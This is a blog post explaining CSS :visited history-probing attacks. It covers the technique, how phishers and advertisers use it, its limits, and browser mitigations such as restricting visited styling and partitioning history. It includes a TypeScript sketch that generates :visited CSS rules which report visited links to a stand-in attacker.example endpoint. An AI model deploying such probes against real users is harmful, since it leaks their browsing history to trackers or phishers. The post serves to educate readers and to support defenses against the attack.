CSS History Probing, or: "I know where you went last week"

Background
One of the interesting attacks which makes the rounds every few years concerns the ability of web pages to use CSS to detect whether or not certain URLs have been visited.  Given a sufficiently large set of URLs to probe, a website may be able to develop an interesting profile of where your browser has been.

You can try a simplistic demo of this here: CSS History Probing.  The demo used to work in pretty much any browser (see comments).

Implications
The security and privacy implications of this design vulnerability are obvious, and clever folks are finding more and more ways to take advantage of it. 

It's been suggested that phishers could use this technique to determine where you bank and select the most appropriate phishing site when you visit their "uber" phishing page.  (Of course, if my inbox is any guide, most phishers are content to blast everyone with every phishing attempt.)

At HITB2008, Jeremiah Grossman said his research showed that advertisers and marketers are the only folks using this trick broadly; when you visit CarCoA, for instance, they're probably very interested in knowing whether you're also shopping at CarCoB.  Similarly, a banner advertising provider could show more relevant ads by probing for visits to a few top sites in each category (e.g. sports, entertainment, news) to build a "good-enough" demographic profile of the viewer's age, location, and interests.

Beyond Evil.com and Madison Avenue, there are even some useful scripts that use this information leak in non-malicious ways.

Limitations
This vulnerability is subject to a number of limitations, the most important of which is that the attacker must correctly generate the exact URL that the user has visited.  So, for instance, an attacker can easily detect that you've visited Bing.com to perform a search, but it's much harder for him to detect what you searched for, because he would have to probe every possible search query (or at least, all queries he's interested in detecting).  Additionally, the information leakage is limited by the duration that the browser is configured to retain history, and other factors I'll cover in the next section.
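
To illustrate the exact-URL limitation, here is a minimal TypeScript sketch of how an attacker might build the list of URLs to probe for a fixed set of search queries. The function name, the search.example host, and the ?q= URL template are all hypothetical and chosen for illustration only; they are not any real search engine's format.

```typescript
// Hypothetical helper: build the exact URLs an attacker would have to probe
// to learn whether any of a fixed list of search queries was issued.
// The "?q=" template is an illustrative assumption, not a real site's format.
function candidateSearchUrls(baseUrl: string, queries: string[]): string[] {
  return queries.map((q) => `${baseUrl}?q=${encodeURIComponent(q)}`);
}

// Two queries the attacker cares about yield exactly two probe URLs.
const searchCandidates = candidateSearchUrls("https://search.example/search", [
  "flu symptoms",
  "mortgage rates",
]);
```

Each entry matches only a visit to that exact string. A different parameter order, an extra tracking parameter, or different capitalization in the query produces a different URL, and the probe misses it.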

Fixes and Mitigations
As with any vulnerability that has been around a while and has received lots of exposure, a great many "fixes" have been proposed.  Unfortunately, as is usually the case, most are non-starters for one reason or another.

  1. Disable scripting.  This isn't sufficient to block the attack; CSS rules can be written so that the attacker's server gets a unique request indicating the visited state.  (e.g. #Link1:visited { background: url(nonce); })
  2. Disable CSS.  This would work, but it would make the web pretty ugly.
  3. Disable Visited Link tracking entirely.  This would work, although it would entail a pretty significant user-experience penalty because the user could no longer see what sites had been visited.  There's an unsupported registry key available to IE8 users to disable Visited Links.  To do so, create a REG_SZ named Disable Visited Hyperlinks inside HKCU\Software\Microsoft\Internet Explorer\Settings\ with the value yes.
  4. Only allow Visited styling using rules that don't have detectable side-effects.  This is fairly restrictive, because if you allow any significant amount of styling (size, background image, font, etc) you can construct a page that detects that the rules have been applied.  This is the path that WebKit & Firefox announced they were taking in April 2010 and this is also the approach that IE9 Release Candidate uses.
  5. Disable Visited styling for cross-domain links.  This would work, although there's a performance penalty and a user-experience penalty; the user experience at aggregation sites like Slashdot or Digg would be impacted.
  6. Partition the cache and visited links based on site of origin. This works, although there's a performance penalty and a user-experience penalty for doing so.  Folks at Stanford put together add-ons that show how this would work.
  7. Use your browser's privacy features.  If you set your browser history to Clear-on-Exit, or your history to expire regularly (see Tools / Options / Browsing History), you can scope down the duration that Visited Links are retained.  Better still, IE8's InPrivate Browsing feature blocks CSS visited link detection (Firefox 3.5's Private Browsing feature and Chrome 2's Incognito feature do the same).  
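
To make the first item in the list concrete, here is a minimal TypeScript sketch of how a script-free probe could be generated. The names buildCssProbe and ProbeTarget, the probeN element ids, and the attacker.example reporting endpoint are all hypothetical; this is one way such a page might be assembled, not a description of any particular attack in the wild.

```typescript
// One candidate URL plus the opaque token the attacker's server will recognize.
interface ProbeTarget {
  url: string;
  token: string;
}

// Emit one :visited rule per target, plus the matching link markup.
// `reportBase` is a hypothetical attacker-controlled endpoint.
// Assumption: target URLs contain no characters that need HTML escaping.
function buildCssProbe(
  targets: ProbeTarget[],
  reportBase: string
): { css: string; html: string } {
  const css = targets
    .map(
      (t, i) =>
        `#probe${i}:visited { background: url("${reportBase}?hit=${encodeURIComponent(t.token)}"); }`
    )
    .join("\n");
  const html = targets
    .map((t, i) => `<a id="probe${i}" href="${t.url}"></a>`)
    .join("\n");
  return { css, html };
}
```

In a browser that applies the rule, the background image is requested only for links in the visited state, so the server learns which tokens "hit" without any script running. A browser that restricts Visited styling as described in item 4 would ignore the background declaration, and no request would be sent.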

Visited Links are completely disabled while you’re InPrivate.  If you visit your “trusted” sites while InPrivate, those sites are not added to your history, so effectively a partition has been created:

  • If you visit trusted sites InPrivate, then that “trusted” history isn’t available to untrusted sites even when browsing outside of InPrivate. 
  • On the other hand, if you visit untrusted sites while InPrivate, then those sites will not be able to determine ANY of your browsing history using the Visited Links trick.
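
The partitioning idea, whether done deliberately as in item 6 or as a side effect of InPrivate, can be sketched as a visited-link store keyed by the site the link was followed from. This is a rough TypeScript illustration under my own assumptions; the class name, method names, and the choice of a plain site string as the key are hypothetical and are not taken from the Stanford add-ons or from any browser's implementation.

```typescript
// Hypothetical visited-link store partitioned by the site that showed the link.
class PartitionedVisitedLinks {
  // Maps a site to the set of link URLs the user followed from that site.
  private readonly visitedBySite = new Map<string, Set<string>>();

  // Record that the user followed `linkUrl` from a page on `sourceSite`.
  recordVisit(sourceSite: string, linkUrl: string): void {
    let links = this.visitedBySite.get(sourceSite);
    if (links === undefined) {
      links = new Set<string>();
      this.visitedBySite.set(sourceSite, links);
    }
    links.add(linkUrl);
  }

  // A link is reported as visited only to the site it was followed from.
  isVisited(requestingSite: string, linkUrl: string): boolean {
    const links = this.visitedBySite.get(requestingSite);
    return links !== undefined && links.has(linkUrl);
  }
}
```

With a store like this, a link followed from one site still shows as visited on that site, but a probe for the same URL from a different site comes back as unvisited. The cost is the user-experience penalty mentioned above: links you reached by some other route no longer appear visited.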

Origins - Vulnerable by Design
As I mentioned in my MiX09 talk, many browser security vulnerabilities arise from the complexity of the browser platform and the (sometimes unforeseen) interactions of the basic browsing technologies (JavaScript, CSS, DOM, HTTP, extensibility, etc).  In this case, the design of CSS contains a pretty straightforward vulnerability which allows for detection of which links have been visited and which have not.  

The architects of CSS clearly had the best of intentions, as highlighting visited links can help users more easily navigate a site.  Unfortunately, this useful feature had some unexpected consequences when exposed to clever web developers in the real world. 

Trying to correct design vulnerabilities after the development and deployment of products based on the design is incredibly difficult, because compatibility and user-experience regressions inevitably ensue. As a result, design vulnerabilities often remain unaddressed or partially mitigated for years, as has happened in this case.

As the web platform grows more powerful, it's critical that architects and browser developers detect and remediate design problems before standards are ratified.

-Eric